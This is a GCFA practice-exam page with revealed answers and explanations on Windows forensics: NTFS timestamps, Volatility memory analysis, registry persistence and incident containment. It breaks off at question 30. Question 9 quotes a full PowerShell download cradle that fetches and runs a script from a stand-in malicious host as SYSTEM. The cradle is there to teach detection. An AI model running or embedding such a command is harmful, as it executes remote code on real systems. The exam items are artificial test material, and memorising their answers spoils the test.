Courseiva

GIAC Certified Forensic Analyst (GCFA) — Questions 1–75

292 questions total · 4pages · All types, answers revealed

Page 1 of 4

Page 2
1
Multi-Selecthard

An investigator is analyzing a Windows 10 system and needs to correlate file system timestamps with other artifacts to build a comprehensive timeline. Which two of the following Windows artifacts can provide additional temporal context when combined with NTFS timestamps? (Choose two.)

Select 2 answers
A.Prefetch files
B.$MFT
C.$LogFile
D.Windows Event Logs
E.Registry hive files
AnswersA, D

Prefetch files (.pf) store information about applications executed on the system, including last run times and loaded files. They can be used to determine when an executable was run, which can be correlated with file creation or modification times. This helps establish cause and effect, such as an application creating or modifying files after execution. Prefetch is a key artifact for timeline enrichment.

Why this answer

Windows Event Logs and Prefetch files provide independent temporal data that can be correlated with NTFS timestamps. Event logs record system and user activities, while prefetch shows application execution. Together, they enrich a timeline by providing context for file system changes, helping analysts understand the sequence of events.

Exam trap

The trap here is selecting file system internal structures like $MFT or $LogFile, which are already part of the NTFS metadata, instead of external artifacts that provide additional context.

2
MCQmedium

Which conclusion regarding this network logon event is most accurate based on the provided Windows Event Log details?

A.The user performed an interactive console logon
B.The authentication utilized NTLMv1 or failed to negotiate encryption
C.The event represents a Kerberos ticket granting service request
D.The account was locked out due to excessive attempts
AnswerB

A key length of 0 in an NTLM authentication event is a strong indicator of NTLMv1 usage or a failure to negotiate session security. This is critical for forensic analysts because NTLMv1 is cryptographically weak, and its presence often signals that an attacker is attempting to downgrade the authentication protocol.

Why this answer

A Logon Type 3 indicates a network logon, typically associated with accessing a shared resource or remote service. The 'NtLmSsp' package signifies NTLM authentication, and the Key Length of 0 indicates that NTLMv1 is being used or encryption is absent. This suggests a legacy or potentially insecure authentication attempt, which is a common indicator of lateral movement using outdated protocols that are susceptible to relay attacks.

Exam trap

Candidates often mistake a Logon Type 3 for a simple interactive login or misinterpret the NTLM key length as a successful encryption attempt rather than a indicator of legacy/weak protocols.

3
MCQmedium

During an enterprise incident, your team identifies that an attacker has deployed a ransomware variant that encrypts files on a critical file server. The attacker also exfiltrated sensitive data before encryption. Which of the following best describes the appropriate containment strategy?

A.Isolate the file server from the network by disabling its network interface and then restore from the most recent backup.
B.Shut down the file server immediately to stop the encryption process and prevent the attacker from accessing any further data.
C.Immediately disconnect the file server from the network, preserve volatile memory, and then proceed with eradication and recovery after scoping the full extent of the compromise.
D.Leave the server online to monitor the attacker's activity and gather more intelligence, while blocking outbound traffic to known command-and-control servers.
AnswerC

This approach correctly prioritizes containment (disconnecting the server) to stop further encryption and potential lateral movement, while also preserving volatile evidence (memory) for forensic analysis. It acknowledges the need to scope the incident before eradication and recovery, which is critical because the attacker may have compromised other systems or established persistence. This aligns with best practices for handling a ransomware incident with data exfiltration.

Why this answer

The correct approach is to contain the incident by disconnecting the server to stop further encryption and potential lateral movement, while preserving volatile memory for forensic analysis. It is essential to scope the full extent of the compromise before eradication and recovery, as the attacker may have other footholds. This balanced approach aligns with incident response best practices for ransomware with data exfiltration.

Exam trap

The trap here is assuming that shutting down the server is the best way to stop encryption, but that destroys volatile evidence and may hinder recovery.

4
MCQeasy

An analyst reviewing a Windows workstation finds that the file C:\Windows\System32\drivers\etc\hosts has been modified and now contains several entries mapping well-known banking domains to 127.0.0.1. The file's LastWriteTime is two days ago, and no administrator has reported making the change. Which conclusion is MOST appropriate?

A.The modification indicates that the DNS Client service has been disabled on the host.
B.The modification is consistent with host-file redirection used to block or intercept traffic to specific domains and warrants further investigation.
C.The modification is benign because hosts-file changes are always performed by the user for ad-blocking purposes.
D.The modification is a normal Windows update behavior and should be ignored.
AnswerB

The hosts file is a common target for malware that redirects known domains to loopback or to attacker infrastructure to intercept or block traffic. Mapping banking domains to 127.0.0.1 is a classic pattern that prevents the real site from loading while potentially enabling credential theft via a local listener. The unexplained modification and recent timestamp justify immediate investigation.

Why this answer

Redirecting well-known banking domains to 127.0.0.1 through the hosts file is a recognized adversary technique for intercepting or blocking traffic, and the unexplained, recent modification makes it more suspicious. The appropriate response is to investigate the change, identify the process or account responsible, and examine the host for related indicators rather than dismissing it as routine or user-initiated.

Exam trap

The trap here is assuming any hosts-file edit is harmless user customization, when redirecting banking domains to loopback is a classic interception technique rather than ad-blocking.

5
MCQeasy

Which memory artifact is most useful for reconstructing the command-line arguments used to execute a suspicious program?

A.The Master File Table (MFT)
B.The Process Environment Block (PEB)
C.The Registry Hive files
D.The System Service Descriptor Table (SSDT)
AnswerB

The PEB is a user-mode data structure that contains essential information about a process, including the full command line used to launch it. Accessing this via memory forensics allows analysts to recover the exact execution path and any arguments passed to the malicious process, which are often missing.

Why this answer

Reconstructing command-line arguments is essential for understanding the specific intent of a malicious executable. The Process Environment Block (PEB) contains the command line string passed to a process at the time of its creation. By extracting this structure from memory, an analyst can reveal hidden parameters, remote IP addresses, or command flags that the malware author attempted to hide from the visual process list, providing critical context for the investigation.

Exam trap

Candidates often look for the command line in the EPROCESS structure itself, not realizing that the kernel does not store the full command-line string there, but rather points to the PEB.

6
MCQeasy

Which of the following describes the 'MAC' in MACB times during timeline analysis?

A.Memory, Application, Cache, and Buffer.
B.Modification, Access, Change, and Birth.
C.Main, Auxiliary, Configuration, and Backup.
D.Master, Allocation, Cluster, and Bit-map.
AnswerB

Modification tracks content changes, Access tracks reading, Change tracks metadata updates, and Birth tracks file creation. These four points are essential for building a comprehensive view of file activity. By analyzing these, an investigator can determine if an attacker simply viewed a file or if they modified its contents.

Why this answer

MACB refers to the four primary timestamps: Modification, Access, Change, and Birth (Creation). These are the fundamental metadata points recorded by file systems. Understanding these timestamps is the core of timeline forensics, as they allow analysts to reconstruct the sequence of events.

Each timestamp provides a different perspective on how a file was interacted with, enabling the investigator to distinguish between reading, editing, and creating files on the disk.

Exam trap

Candidates occasionally confuse 'Change' with 'Creation,' thinking 'C' stands for creation. In NTFS, 'C' stands for MFT entry modification (Change), while 'Birth' represents the file creation time.

7
MCQeasy

A forensic analyst is building a timeline from an NTFS volume and wants to include the time when a file's metadata was last changed, such as permission modifications. Which timestamp should the analyst focus on to capture this event?

A.Accessed time (atime)
B.Entry modified time (ctime)
C.Modified time (mtime)
D.Creation time (crtime)
AnswerB

The entry modified time (ctime) in NTFS, also known as the MFT change time, is updated whenever the file's metadata or MFT record changes, including permission modifications, ownership changes, or attribute updates. It does not change when only file content is modified (that updates mtime). Thus, ctime is the correct timestamp to capture metadata changes like permission alterations.

Why this answer

In NTFS, the entry modified time (ctime) is updated whenever the file's MFT record is changed, which includes modifications to security descriptors, ownership, and other metadata. This makes it the correct timestamp for detecting permission changes. The modified time (mtime) only reflects data writes, the accessed time (atime) reflects reads, and the creation time (crtime) is fixed at file creation.

Thus, ctime is the key timestamp for metadata alterations such as permission modifications.

Exam trap

The trap here is confusing the entry modified time (ctime) with the creation time (crtime) or assuming that mtime captures all changes, when in fact ctime specifically records metadata changes like permissions.

8
MCQmedium

While reviewing a Windows host, you find a 4688 process creation event where the new process is C:\Windows\System32\svchost.exe but the parent process image is C:\Users\bob\AppData\Local\Temp\update.exe. The command line for svchost.exe contains -k netsvcs with no additional arguments. Which assessment is best supported?

A.The parent process path indicates a likely masquerading or code-injection event that warrants memory analysis of svchost.exe.
B.The command line is malformed and shows svchost.exe was invoked without the required -k service group.
C.The event is a false positive caused by Sysmon logging the wrong parent process for service hosts.
D.This is normal behavior because svchost.exe is frequently launched from user directories during updates.
AnswerA

The legitimate parent of svchost.exe is services.exe, so a user Temp directory parent is a strong indicator of process injection, hollowing, or a masquerading loader. The command line matches a valid service host invocation, which an attacker would copy to blend in. Capturing a memory image of the process and checking loaded modules and thread start addresses is the appropriate next step.

Why this answer

A user Temp directory as the parent of svchost.exe contradicts the normal services.exe parent-child relationship and points to injection or a masquerading loader. The correct-looking command line is part of the deception. Memory acquisition and module inspection of the process will confirm whether the service host is hosting malicious code.

Exam trap

The trap here is judging svchost.exe by its path and command line alone, when the parent process image is the artifact that exposes injection or masquerading.

9
MCQeasy

A security analyst is examining a Windows 10 system and finds a scheduled task named 'Updater' that runs 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious.site/payload.ps1')"' every hour. The task is configured to run under the SYSTEM account. Which of the following best describes the malicious technique being used?

A.The scheduled task is using a PowerShell logging bypass to avoid detection, which is a common defense evasion technique.
B.The scheduled task is using a PowerShell profile script to maintain persistence, which is a common technique for surviving reboots.
C.The scheduled task is using a PowerShell download cradle to retrieve and execute a remote payload, which is a common fileless malware technique.
D.The scheduled task is using a PowerShell remoting command to execute a script on a remote system, which is a common lateral movement technique.
AnswerC

The command uses IEX (Invoke-Expression) to download and execute a PowerShell script from a remote URL. This is known as a download cradle and is a classic fileless malware technique because the payload is not written to disk. The use of -W Hidden and -Exec Bypass further indicates an attempt to evade detection. Scheduled tasks are often used for persistence.

Why this answer

The command uses Invoke-Expression to download and execute a PowerShell script from a remote URL, which is a download cradle. This allows the attacker to run arbitrary code without writing it to disk, making it fileless. The scheduled task provides persistence, running the command hourly as SYSTEM.

This combination is a common malware technique.

Exam trap

The trap here is focusing on the scheduled task or the PowerShell parameters as the primary technique, when the core malicious action is the download and in-memory execution of a remote payload via a download cradle.

10
MCQmedium

Refer to the exhibit. An attacker attempts to use a compromised identity with this policy to modify a file in the 'sensitive-data' bucket. What is the expected outcome?

A.The request is denied by the service.
B.The request is successful due to default wide permissions.
C.The request is successful because the resource is a bucket wildcard.
D.The request is denied only if MFA is enabled.
AnswerA

The policy only contains 's3:GetObject', which is a read-only permission. Any attempt to modify data requires 's3:PutObject' or similar write permissions. Since the policy does not include these, the AWS service will return an 'Access Denied' error for the unauthorized modification attempt, preventing the attacker from altering the files.

Why this answer

The IAM policy explicitly grants the 's3:GetObject' permission, which allows reading files but not modifying them. Because IAM policies follow the principle of least privilege and default to deny, any action not explicitly granted—such as 's3:PutObject' or 's3:DeleteObject'—will be denied. This is crucial for responders to understand, as it confirms that the attacker's write-based actions were blocked, potentially limiting the impact to data exfiltration rather than data tampering.

Exam trap

Candidates often assume that if a user has access to a bucket, they can modify its contents. They overlook that specific IAM actions are granular and must be explicitly permitted.

11
MCQeasy

An analyst is reviewing a Windows 10 system and wants to determine the last time a user accessed a specific file. The analyst examines the file's NTFS standard information attributes and finds that the last access time is not updated. What is the most likely reason for this?

A.NTFS last access time updates are disabled by default.
B.The file has the 'N' attribute set.
C.The file system is mounted as read-only.
D.The file is on a network share.
AnswerA

Windows disables last access time updates by default to improve performance. This behavior is controlled by the registry value NtfsDisableLastAccessUpdate, which is set to 1 by default in modern Windows versions. Therefore, the last access time is not updated when files are accessed, explaining why the analyst sees no recent timestamp.

Why this answer

By default, Windows disables last access time updates to reduce disk I/O. The registry value NtfsDisableLastAccessUpdate controls this, and it is set to 1 on most modern systems. As a result, the last access time may not reflect recent file accesses, making it unreliable for forensic purposes unless the setting has been changed.

Exam trap

The trap here is assuming that last access time is always updated, when in fact it is disabled by default, leading analysts to draw incorrect conclusions about file access.

12
MCQmedium

An analyst is examining an NTFS volume and notices a discrepancy where the $Standard_Information attribute modification time is earlier than the $File_Name attribute modification time. What does this specific pattern indicate about the file's history?

A.The file was compressed by the NTFS engine.
B.The file was moved across different NTFS volumes.
C.The file's metadata was likely modified by an anti-forensics tool.
D.The file was recently recovered from the Recycle Bin.
AnswerC

User-mode tools modify the $Standard_Information attribute to hide execution or creation time. Because these tools cannot easily modify the $File_Name attribute—which is protected by the Windows kernel—the discrepancy emerges. This signature is a primary artifact used by responders to identify malicious file manipulation and temporal masking.

Why this answer

This pattern is a classic indicator of 'timestomping' or anti-forensics activity. The $Standard_Information attribute is easily modified by user-level APIs, while the $File_Name attribute is typically updated only by the system kernel during move or rename operations. When an attacker resets the $Standard_Information timestamps to blend in, the $File_Name attribute often retains the true metadata, revealing the manipulation.

Exam trap

Many candidates confuse which NTFS attribute is easily modified by user-level APIs versus the kernel, leading them to misidentify the original timeline during timestomping analysis.

13
MCQmedium

Which of the following best describes the function of the 'UserAssist' registry key in a Windows forensic investigation?

A.Tracks all system-wide driver installations and updates.
B.Records the last time a user logged onto the system.
C.Tracks the execution of GUI-based applications for each user.
D.Stores the history of web browsing sessions in Internet Explorer.
AnswerC

UserAssist stores a record of applications executed by a specific user through the Windows shell. It tracks the name, path, execution count, and the last time it was run. It is a highly reliable source for forensic analysts needing to prove that a user interacted with a specific piece of software.

Why this answer

UserAssist records information about GUI-based programs executed by a user, including the file path, execution count, and last execution time. It is stored in the user's NTUSER.DAT hive. This artifact is essential for determining user activity, establishing which applications were launched, and identifying the persistence of specific malicious binaries across sessions.

It helps investigators prove that a specific user was responsible for launching an application, which is crucial for attribution.

Exam trap

Test-takers often confuse UserAssist with command-line history or background service execution, missing the specific focus of UserAssist on GUI-based user applications.

14
MCQmedium

An analyst is investigating a Windows 10 system where an attacker allegedly used a remote access tool (RAT) that persists by modifying the Image File Execution Options (IFEO) registry key. The analyst wants to identify which executable was hijacked. Which registry location should the analyst examine to find the Debugger value that redirects execution?

A.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
B.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
C.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
D.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache
AnswerA

Image File Execution Options (IFEO) is the correct registry location. Attackers can create a subkey named after a legitimate executable (e.g., notepad.exe) and set a Debugger string value pointing to their malicious binary. When the legitimate executable is launched, Windows starts the debugger instead, achieving persistence and execution. This matches the scenario.

Why this answer

IFEO hijacking involves creating a subkey under Image File Execution Options named after a legitimate executable and setting a Debugger value to a malicious program. This causes Windows to launch the debugger instead of the intended executable. The correct registry path is HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options.

Other options are unrelated persistence or forensic artifacts.

Exam trap

The trap here is confusing IFEO with standard Run key persistence, which does not redirect execution of other processes.

15
MCQmedium

Given the command-line exhibit, what is the best strategy to analyze the behavior of this process?

A.Search for the process name in the Shimcache
B.Decode the base64 string and perform script analysis
C.Check the MFT for the parent process file
D.Run a system file integrity check
AnswerB

Decoding the base64 string is the only way to reveal the underlying PowerShell script executed by the attacker. This allows the analyst to see the actual commands, identify the targeted actions, and determine the scope of the incident, which is essential for creating an effective remediation plan for the compromised host.

Why this answer

The command line uses the '-enc' parameter, indicating a base64-encoded PowerShell script. Forensic analysts must decode this string to understand the attacker's intent. Once decoded, the analyst can identify the actual commands being run—such as downloading additional payloads or communicating with C2 servers.

This is critical in modern incident response because obfuscation is a routine tactic to evade basic keyword-based monitoring and initial detection by security analysts.

Exam trap

Candidates often assume running a static file analysis or searching for malicious domain names directly on the exhibit is sufficient, forgetting that '-enc' demands immediate decoding of the obfuscated PowerShell script before any other progress.

16
MCQeasy

An analyst acquires a forensic image of a Windows 10 NTFS volume using a write blocker and now needs to build a file system timeline. The analyst wants to include the $STANDARD_INFORMATION timestamps but also wants to detect timestomping by comparing them with the $FILE_NAME timestamps. Which tool should the analyst use to extract both timestamp sets from the MFT and generate a bodyfile for timeline creation?

A.ntfs-3g
B.log2timeline.pl
C.MFTECmd
D.fls from The Sleuth Kit
AnswerC

MFTECmd parses the $MFT and outputs both $STANDARD_INFORMATION and $FILE_NAME timestamps in a CSV or bodyfile-compatible format. This allows the analyst to compare the two timestamp sets and detect timestomping, which is exactly what the scenario requires.

Why this answer

MFTECmd is specifically designed to parse the $MFT and output both $STANDARD_INFORMATION and $FILE_NAME timestamps, enabling direct comparison for timestomping detection. The other tools either do not extract both timestamp sets or are not intended for this purpose.

Exam trap

The trap here is assuming that any tool that can parse the MFT will automatically output both $STANDARD_INFORMATION and $FILE_NAME timestamps, when many only report the $STANDARD_INFORMATION set by default.

17
MCQhard

A forensic examiner is analyzing a memory image from a Windows 7 system that is suspected of being compromised by a sophisticated rootkit. The examiner runs the Volatility 2 plugin 'ssdt' and notices that several system service dispatch table (SSDT) entries point to addresses within a kernel module that is not signed by Microsoft and is not present in the loaded module list. Which of the following best describes the rootkit technique that is most likely in use?

A.Import Address Table (IAT) hooking, where the rootkit modifies the IAT of user-mode processes to redirect API calls to its own code.
B.SSDT hooking, where the rootkit replaces the function pointers in the SSDT to redirect system calls to its own malicious functions.
C.Inline hooking of the SSDT functions, where the rootkit overwrites the first bytes of the legitimate functions with a jump to its own code.
D.DKOM on the SSDT, where the rootkit unlinks the SSDT from the kernel's list of service tables to hide its modifications.
AnswerB

SSDT hooking involves modifying the SSDT so that system service calls are redirected to malicious code. The SSDT normally contains pointers to legitimate kernel functions. If entries point to an unsigned module not in the loaded module list, it indicates that the table has been tampered with. This is a classic rootkit technique to intercept system calls and hide its activities, and it matches the observed evidence.

Why this answer

The SSDT contains pointers to kernel functions for system services. If entries point to an unsigned module not in the loaded module list, it indicates that the SSDT has been hooked—modified to redirect system calls to malicious code. This is a classic rootkit technique to intercept and manipulate system calls, allowing the rootkit to hide its presence and activities.

Inline hooking and IAT hooking affect different structures, and DKOM does not apply to the SSDT in this manner.

Exam trap

The trap here is confusing SSDT hooking with inline hooking; SSDT hooking changes the function pointers in the table, while inline hooking patches the function code itself, leaving the table intact.

18
MCQmedium

An analyst is examining an NTFS volume and notices that a file's MFT entry shows a modification time earlier than its creation time. What is the most likely cause for this anomaly?

A.The file system is corrupted and requires an immediate CHKDSK operation.
B.The operating system experienced a clock drift during the file write process.
C.The file was moved from another volume or manipulated using timestomping techniques.
D.The master file table is using short filename (8.3) format which ignores creation time.
AnswerC

Moving a file across volumes creates a new entry with an updated creation time, while copying or direct metadata manipulation can force the modification time to an older value. Recognizing this behavior is essential because attackers often use tools to modify these attributes, attempting to blend malicious files into existing directory structures.

Why this answer

This anomaly is frequently caused by the 'timestomping' technique or a file move operation where the original metadata is preserved. By understanding file system internals, an analyst recognizes that MFT entry times are susceptible to manipulation via user-mode tools or low-level API calls. Detecting these inconsistencies is critical for identifying anti-forensics activity or specific file system behaviors that could lead to misinterpretation of the true timeline of events.

Exam trap

Candidates tend to immediately suspect only malware timestomping, forgetting that standard administrative actions like moving a file across volumes can also alter MFT timestamps.

19
MCQmedium

Which of the following describes the purpose of the 'Object Header' in Windows memory forensics?

A.It stores the process command line arguments
B.It is used for memory page table translations
C.It contains metadata like reference counts and types
D.It provides a mapping for disk-based sectors
AnswerC

The object header is an essential kernel data structure that tracks reference counts and object types. Forensic analysts use this header to understand how the kernel is managing an object, which can reveal information about the object's origin, its protection state, and its current status in memory.

Why this answer

The Object Header precedes the body of every object managed by the Windows kernel, such as processes, threads, or files. It contains critical metadata, including the object type, reference count, and security descriptor. For forensic analysts, this header provides vital information about the object's lifespan and permissions, which is crucial for identifying unauthorized access or tracking the lifecycle of malicious objects within the kernel's memory management system.

Exam trap

Candidates frequently mistake the Object Header for actual process execution code, missing its true function as a kernel metadata container tracking object lifespans and permissions.

20
MCQeasy

An analyst is using The Sleuth Kit to analyze an NTFS image. They run `fls -r -m C:/` to generate a body file and then `mactime -b bodyfile -d` to produce a timeline. They notice that the timeline includes entries for files with a '$' prefix, such as $MFT, $LogFile, and $Bitmap. What is the most appropriate action for the analyst to take regarding these entries?

A.Include them in the timeline and analyze their timestamps as they can provide evidence of file system activity and potential anti-forensic actions.
B.Convert them to a separate timeline using a different tool because The Sleuth Kit cannot correctly interpret their timestamps.
C.Immediately report them as indicators of compromise because their presence in the timeline suggests unauthorized access.
D.Exclude them from the timeline because they are system files and not relevant to user activity.
AnswerA

System files such as $MFT, $LogFile, and $Bitmap are integral to the NTFS file system and their timestamps can reveal significant events, such as when the MFT was last modified, when the log file was written, or when the volume bitmap was changed. These can indicate file system activity, including potential anti-forensic actions like timestomping or wiping. Including them in the timeline is essential for a comprehensive analysis.

Why this answer

NTFS system files such as $MFT, $LogFile, and $Bitmap are essential components of the file system and their timestamps can provide critical evidence. They should be included in the timeline because they can show file system events, such as when the MFT was last written or when the log file was updated, which may correlate with user activity or anti-forensic actions. Excluding them would omit valuable data.

Exam trap

The trap here is assuming that system files are irrelevant noise and should be filtered out, when in fact they contain important metadata for timeline analysis.

21
Multi-Selectmedium

You are analyzing a Windows 10 memory dump for evidence of a kernel-mode rootkit that may have unlinked a malicious driver from the active module list. Which two Volatility 3 plugins would you use together to detect and enumerate such a hidden driver? (Choose two.)

Select 2 answers
A.windows.modscan
B.windows.driverirp
C.windows.callbacks
D.windows.modules
E.windows.driverscan
AnswersA, E

windows.modscan scans kernel pool memory for module structures, which can reveal modules that have been unlinked from the active module list. This is exactly the technique needed to find a hidden driver that a rootkit has removed from PsLoadedModuleList. It can detect the malicious driver's residual metadata, making it a correct choice for this scenario.

Why this answer

To detect a driver that has been unlinked from the active module list, you need plugins that scan kernel pool memory for driver-related structures. windows.modscan finds module structures, and windows.driverscan finds driver objects. Together they can reveal a hidden driver that a rootkit has unlinked. The other plugins either list only active modules, focus on IRP hooking, or enumerate callbacks, none of which directly detect unlinked drivers.

Exam trap

The trap here is assuming that windows.modules will show all loaded drivers, but a rootkit can unlink its driver so that it no longer appears in that list.

22
MCQmedium

A forensic analyst is examining an ext4 file system image from a Linux server. Using fls and istat from The Sleuth Kit, the analyst sees a deleted file whose inode still contains block pointers that now point to blocks reallocated to another file. The analyst wants to determine whether the deleted file's content can be recovered intact. Which ext4 condition best explains why the content is likely unrecoverable?

A.The ext4 extent tree was converted to indirect block mapping, invalidating the pointers
B.The file's data blocks have been reallocated to another inode, so the original content is overwritten
C.The inode's deletion time in the superblock has been overwritten by the journal
D.The inode's link count was set to zero, which automatically zeroes all data block pointers
AnswerB

When ext4 deletes a file, the inode's block pointers may remain until the inode is reused, but the blocks themselves are returned to the free pool. If those blocks are reallocated to another file and written, the original content is overwritten. In this scenario, the pointers now reference blocks owned by another inode, meaning the data is no longer intact and recovery of the original content is not possible from those blocks.

Why this answer

On ext4, deleting a file frees its data blocks but often leaves the inode's block pointers intact until the inode is reused. Recovery is possible only while those blocks remain unallocated and unmodified. When the blocks are reallocated to another file and written, the original data is overwritten, so the deleted file's content cannot be recovered intact even though the inode still references the block numbers.

Exam trap

The trap here is believing that a surviving inode with block pointers guarantees recoverable content, when block reallocation and overwrite are what actually destroy the data.

23
MCQeasy

What is the primary function of the $LogFile in an NTFS file system?

A.To store user authentication logs.
B.To support file system recovery and consistency.
C.To track file access by unauthorized users.
D.To store the contents of deleted files.
AnswerB

The $LogFile is a journal of transactions used by NTFS to ensure that the file system remains in a consistent state if a crash occurs. It tracks changes to metadata before they are finalized in the MFT, making it a critical source for investigating recent, volatile file system activity.

Why this answer

The $LogFile is a circular buffer used to ensure file system consistency, particularly during system crashes. It records metadata transactions, allowing the system to roll back or finish operations that were interrupted. For forensic analysts, the $LogFile acts as a record of 'in-progress' operations that may not have been committed to the MFT yet, providing an essential look into very recent system activity that is otherwise invisible in standard MFT analysis.

Exam trap

Candidates often mistake the $LogFile for a user activity log, failing to realize its primary purpose is system recovery and consistency, not tracking user-level actions.

24
Multi-Selectmedium

A forensic analyst is examining a Windows 10 memory image to identify potential process injection. The analyst runs Volatility 3 plugins and focuses on the windows.malfind output. Which two of the following characteristics are most indicative of malicious code injection in a process's memory space? (Choose two.)

Select 2 answers
A.A memory region containing a PE header (MZ) that matches a known legitimate system DLL on disk.
B.A memory region with PAGE_EXECUTE_READWRITE protection that contains a MZ header but has no corresponding file path in the VAD.
C.A memory region with PAGE_READONLY protection that contains configuration data.
D.A memory region with PAGE_EXECUTE_READ protection that is backed by a signed Microsoft DLL.
E.A memory region with PAGE_EXECUTE_READWRITE protection that is not backed by a file on disk.
AnswersB, E

This combines multiple red flags: RWX permissions, an executable header, and no file backing. The absence of a file path in the VAD means the region is unbacked, which is highly suspicious. The MZ header indicates executable content, and RWX allows modification and execution. Together, these strongly suggest that malicious code was injected into the process's memory space, as legitimate modules are file-backed and typically not RWX.

Why this answer

Indicators of process injection include memory regions with PAGE_EXECUTE_READWRITE protection that are unbacked by a file on disk, especially when they contain executable headers like MZ. These characteristics suggest that code was injected directly into the process's address space, bypassing normal module loading. Legitimate code is usually backed by files and has more restrictive permissions.

Therefore, the combination of RWX permissions and lack of file backing is a key red flag.

Exam trap

The trap here is focusing solely on the presence of a PE header or executable permissions without considering file backing; legitimate modules are file-backed, so unbacked RWX regions with PE headers are the true indicators.

25
Multi-Selectmedium

A forensic analyst is examining an NTFS volume and needs to identify which artifacts can provide evidence of file deletion or file system changes that occurred after a file was removed. Which TWO of the following NTFS artifacts are most directly useful for this purpose? (Choose two.)

Select 2 answers
A.$UsnJrnl:$J, which logs file system events including FILE_DELETE and CLOSE reasons.
B.$Volume, which contains the volume label and version information and can indicate volume format changes.
C.$Bitmap, which tracks cluster allocation and can show clusters freed after a file deletion.
D.$AttrDef, which defines valid attribute types and can show when new attributes were added.
E.$Boot, which stores the volume boot sector and can indicate when the volume was last mounted.
AnswersA, C

The USN change journal records events with reason flags, including FILE_DELETE, which indicates a file was deleted. Each record includes the file reference number and timestamp, allowing analysts to correlate deletion events with other activity. This directly supports determining when and possibly how a file was removed.

Why this answer

$Bitmap tracks cluster allocation and can show clusters freed by deletion, while $UsnJrnl:$J logs file system events including FILE_DELETE with timestamps and file references. Together they help identify deleted files and the timing of deletions, making them the most directly useful artifacts among the listed metadata files.

Exam trap

The trap here is confusing general NTFS metadata files with event-logging artifacts, when only $Bitmap and the USN journal provide direct evidence of deletion and post-deletion changes.

26
MCQmedium

An analyst is examining a Windows 10 workstation that is suspected of having a malicious service installed for persistence. The analyst wants to determine the original path of the service executable and the account it runs under. Which registry location should the analyst examine to find this information?

A.HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
B.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C.HKLM\SYSTEM\CurrentControlSet\Control\Session Manager
D.HKLM\SYSTEM\CurrentControlSet\Services
AnswerD

Each subkey under HKLM\SYSTEM\CurrentControlSet\Services represents an installed service and contains values such as ImagePath (the executable path) and ObjectName (the account the service runs under). This is the primary location for service configuration, making it the correct choice for identifying the original path and account.

Why this answer

The Services registry key stores configuration data for every Windows service, including the ImagePath value that points to the executable and the ObjectName value that specifies the account. Examining this key allows the analyst to identify the malicious service's original path and the security context it uses, which is critical for understanding persistence and privilege level.

Exam trap

The trap here is assuming that service information is stored in the Run key or other autostart locations, which are for user-level programs rather than system services.

27
MCQhard

A forensic analyst is investigating a system where a user is suspected of using a tool to hide files by manipulating NTFS metadata. The analyst finds an MFT entry with a $FILE_NAME attribute that has a namespace value of 2 (POSIX) and a $STANDARD_INFORMATION attribute with timestamps that are inconsistent with the file's $UsnJrnl records. Which conclusion is most appropriate regarding the file's naming and timestamp artifacts?

A.The POSIX namespace indicates the file was created by a POSIX-compliant application, and the timestamp inconsistency is likely due to time zone differences.
B.The POSIX namespace is used for files that are encrypted with EFS, and the timestamp inconsistency indicates the file was recently decrypted.
C.The POSIX namespace suggests the file name contains characters that are not allowed in the Win32 namespace, and the timestamp inconsistency may indicate the file was moved or its timestamps were altered.
D.The POSIX namespace indicates the file is a hard link, and the timestamp inconsistency is due to the link being created at a different time than the original file.
AnswerC

The POSIX namespace is used when a file name contains characters that are valid in POSIX but not in Win32, such as trailing spaces or periods. Such names can be used to hide files. The timestamp inconsistency between $STANDARD_INFORMATION and $UsnJrnl records suggests that the $STANDARD_INFORMATION timestamps may have been altered after the file's creation or last change, which is a common anti-forensic technique.

Why this answer

The POSIX namespace in NTFS is used for file names that are valid in POSIX but not in the Win32 namespace, such as those ending with a space or period. Attackers can use such names to hide files from typical Windows tools. The inconsistency between $STANDARD_INFORMATION timestamps and $UsnJrnl records suggests the $STANDARD_INFORMATION timestamps may have been manipulated, a common anti-forensic technique.

Analysts should correlate these artifacts to detect hidden or altered files.

Exam trap

The trap here is assuming that a POSIX namespace always indicates a benign POSIX application, when it can also be used to create hidden or hard-to-access files on Windows.

28
Multi-Selecthard

Which THREE activities are considered best practices when preserving evidence from a cloud-based environment during an incident?

Select 3 answers
A.Take snapshots of all attached volumes for forensic imaging.
B.Capture volatile memory using cloud-native imaging tools.
C.Shut down the instance immediately to stop the attack.
D.Isolate the instance using security group rules.
E.Delete all ephemeral logs to save on cloud storage costs.
AnswersA, B, D

Snapshots provide a point-in-time, read-only copy of the disk data. This is a forensically sound way to preserve evidence without affecting the live production system. It ensures that the state of the evidence remains static, allowing responders to conduct detailed analysis without the risk of contaminating the original data.

Why this answer

Evidence preservation in cloud environments requires non-destructive methods that maintain chain of custody while ensuring data integrity. By creating snapshots, isolating the affected instance, and extracting memory, responders ensure that the state of the system is preserved for deep forensic analysis. These steps are crucial because cloud instances are ephemeral and can be easily deleted or modified, which would destroy the evidence necessary to build a complete incident timeline and identify the root cause.

Exam trap

Candidates often suggest deleting the instance to prevent further damage. This destroys volatile evidence; isolation and snapshotting are the correct non-destructive methods for cloud forensics.

29
MCQmedium

What is the consequence of a file name being stored in the $FILE_NAME attribute but not in the $INDEX_ROOT of its parent directory?

A.The file is encrypted with BitLocker.
B.The file is a system-hidden file.
C.The file is an orphaned file.
D.The file is a compressed sparse file.
AnswerC

A file is orphaned when its MFT record still exists, but the corresponding entry in the parent directory's index is missing or corrupted. This prevents the file from being visible in file explorers, making it a target for forensic recovery as it is essentially 'lost' to the OS.

Why this answer

If a file name exists in the $FILE_NAME attribute but not in the parent directory's $INDEX_ROOT, the file is 'orphaned'. It remains present on the disk in the MFT but is invisible to the OS and users via standard directory navigation. This is a common indicator of a partially successful deletion or a file system error that removed the directory link.

Exam trap

Examinees often confuse 'orphaned' files with 'allocated' or 'resident' files, forgetting that missing parent directory index entries disconnect the file from the directory tree.

30
Multi-Selectmedium

